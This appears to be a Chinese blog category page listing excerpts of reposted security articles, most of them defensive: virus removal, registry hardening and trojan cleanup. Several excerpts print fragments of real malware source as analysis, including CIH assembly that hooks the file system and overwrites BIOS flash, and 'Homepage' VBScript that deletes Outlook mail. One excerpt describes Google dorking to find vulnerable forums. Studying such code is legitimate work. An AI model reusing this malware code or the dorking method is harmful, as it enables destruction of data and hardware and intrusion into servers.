病毒 木马 网络攻防
文章平均质量分 71
lang9527
危机=危险 机会
我惧怕任何危险
也不会放弃任何一个机会
展开
-
保护系统技巧 处理另类无法删除的病毒
1.惊现病毒。朋友的电脑安装的是Windows XP专业版,近来常常彻夜开机用BT下载电影,没想到在一次开机的时候,杀毒软件就报告在下发现病毒“exporer.exe”。 2.查杀。病毒如果无法被直接删除,大多是由于病毒进程在运行导致的,打开任务管理器,找到病毒进程“exporer.exe”顺利将其终止,按照杀毒软件提供病毒文件路径,找到病毒文件后,按住Shift键右击选择“删除”,转载 2007-07-10 21:38:00 · 489 阅读 · 0 评论 -
专家剖析黑客如何通过Google发动攻击
1.利用Google搜索论坛漏洞 动网论坛是常用的论坛程序,很多中小型企业都采用该程序作为自己的论坛。而也正因为其用户广泛,所以树大招风,很多黑客都通过动网论坛程序的漏洞来实现对服务器的入侵。寻找动网论坛的方法之一,就是通过Google 搜索引擎来搜索关键字:Powered By Dvbbs ,如下图: 这样,黑客就可以搜索到大量的动网论坛程序,然后再利用论坛程序的漏洞实现入侵转载 2007-08-02 11:25:00 · 592 阅读 · 0 评论 -
Ghost系统含漏洞藏杀机 伺机破坏计算机
一、WindowsXP万能Ghost系统分析 万能Ghost系统制作时,是在安装成功后删除Windows自带的多余文件,并且删除硬件信息,然后进行系统封装。如果在安装前,制作者有意将某个系统文件替换成木马后门,或者在系统中打开某些端口,开启某些危险服务,留下某些空口令帐户,那么制作出来的Ghost系统就会存在各种安全漏洞。这些Ghost系统流传出去后使用这些系统的用户可能被作者控制为肉鸡转载 2007-07-29 22:39:00 · 572 阅读 · 0 评论 -
病毒程序源码实例剖析-CIH病毒[2]
OriginalAppEXE SEGMENT ;PE格式可执行文件文件头 FileHeader: db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h db 0b8h, 000h, 000h, 000h, 000h, 0转载 2007-07-18 23:17:00 · 871 阅读 · 0 评论 -
病毒程序源码实例剖析-CIH病毒[1]
CIH病毒主要感染Windows 95/98/Me的可执行程序,发作时破坏计算机Flash BIOS芯片中的系统程序,导致主板损坏,同时破坏硬盘中的数据。病毒发作时,硬盘驱动器不停地旋转,病毒程序以2048个扇区为单位,从硬盘主引导区开始依次往硬盘中写入垃圾数据,直到硬盘数据被全部破坏为止。硬盘上所有数据(包括分区表)被破坏,必须重新分区才能有可能挽救硬盘。同时,对于部分厂牌的主板,如技嘉和微转载 2007-07-18 23:16:00 · 2867 阅读 · 0 评论 -
病毒程序源码实例剖析-“主页”病毒[2]
--开始搞破坏,检索Outlook收件箱,将其中主题为“Homepage”的邮件全部删除 --并将“已删除文件夹”清空,同时随机打开四个色情站点中的一个 --创建一个Outlook应用对象 Set s = CreateObject("Outlook.Application") Set t = s.GetNameSpace("MAPI") --获得“收件箱”文件夹对象 S转载 2007-07-19 11:37:00 · 787 阅读 · 0 评论 -
病毒程序源码实例剖析-CIH病毒[3]
jmp ExitRing0Init ;退出Ring0级 ;合并后的代码大小 CodeSizeOfMergeVirusCodeSection = offset $ ;新的IFSMgr_InstallFileSystemApiHook功能调用 InstallFileSystemApiHook: push ebx call @4 @4: pop eb转载 2007-07-18 23:18:00 · 961 阅读 · 0 评论 -
通过修改注册表来增强系统抵抗DDOS攻击[1]
防范DDOS攻击并不一定非要用防火墙。一部份DDOS我们可以通过DOS命令netstat -an more或者网络综合分析软件:sniff等查到相关攻击手法、如攻击某个主要端口、或者对方主要来自哪个端口、对方IP等。这样我们可以利用w2k自带的远程访问与路由或者IP策略等本身自带的工具解决掉这些攻击。做为无法利用这些查到相关数据的我们也可以尝试一下通过对服务器进行安全设置来防范DDOS攻击。如果转载 2007-07-24 01:05:00 · 519 阅读 · 0 评论 -
通过修改注册表来增强系统抵抗DDOS攻击[2]
禁止IP源路由。缺省项值为1,表示不转发源路由包,项值设为0,表示全部转发,设置为2,表示丢弃所有接受的 源路由包,微软站点安全推荐为2。 "DisableIPSourceRouting"=dword:0000002 限制处于TIME_WAIT状态的最长时间。缺省为240秒,最低为30秒,最高为300秒。建议设为30秒。 "TcpTimedWaitDelay"=dw转载 2007-07-24 01:06:00 · 736 阅读 · 0 评论 -
病毒程序源码实例剖析-“主页”病毒[1]
随着 Internet 的迅猛发展,电子邮件已经成为人们相互交流最常使用的工具,于是它也成为新型病毒——电子邮件型病毒的重要载体。最近一两年,出现了许多危害极大的邮件型病毒,如 “爱虫”病毒、“美丽莎”病毒、“库尔尼科娃”病毒、“Naked Wife” 病毒以及 Homepage 病毒等,这些病毒专挑 Windows平台上应用最普遍的邮件客户端——Microsoft Outlook 下手,其发转载 2007-07-19 11:37:00 · 1174 阅读 · 0 评论 -
病毒程序源码实例剖析-CIH病毒[5]
push ecx loop $ ;破坏BIOS中额外的000E0000 - 000E007F段的 ROM数据,共80h个字节 xor ah, ah mov [eax], al xchg ecx, eax loop $ ; 显示和激活BIOS的000E0000 - 000FFFFF段数据,共128 KB,该段可写入信息mov eax, 0f5555h p转载 2007-07-18 23:19:00 · 1800 阅读 · 0 评论 -
斩断入侵黑手防黑客攻击ADSL路由器方法
一、取消文件夹隐藏共享 如果你使用了Windows 2000/XP系统,右键单击C盘或者其他盘,选择“共享”,你会惊奇地发现它已经被设置为“共享该文件夹”,而在“网上邻居”中却看不到这些内容,这是怎么回事呢? 原来,在默认状态下,Windows 2000/XP会开启所有分区的隐藏共享,从“控制面板/管理工具/计算机管理”窗口下选择“系统工具/共享文件夹/共享”,就可以看到硬盘上的每转载 2007-07-16 21:09:00 · 655 阅读 · 0 评论 -
看电影永不中招 查杀RM中的木马病毒
1.利用Helix Producer Plus去除网页木马 如果电脑中安坝腥砑癏elix Producer Plus”,可利用该软件来清除视频中夹带木马的剪辑信息。 首先用记事本建立一个名为“1.txt”的空白文本文件,然后在命令提示符窗口中执行如下命令: “"C:/Program Files/Real/Helix Producer Plus/RealMediaEditor转载 2007-07-10 10:23:00 · 840 阅读 · 0 评论 -
深入黑客内心世界 像黑客一样思考问题
他是怎么知道的呢?很简单,他是一个黑客,像黑客一样思考问题,并且知道黑客使用的工具——这是保护公司不被攻击的最有效方法。作为App防御的首席安全官,Poteet这一类黑客俗称为白帽子黑客或安全研究员——他们挖掘系统漏洞,指出哪里会有麻烦发生。黑帽子黑客是相反的一类——他们为了邪恶的目的企图获得进入系统和数据资料的权限。在过去,大多数黑客是为了好玩或是为了吹牛。 现在,黑帽子黑客在恶意软转载 2007-08-08 10:27:00 · 693 阅读 · 0 评论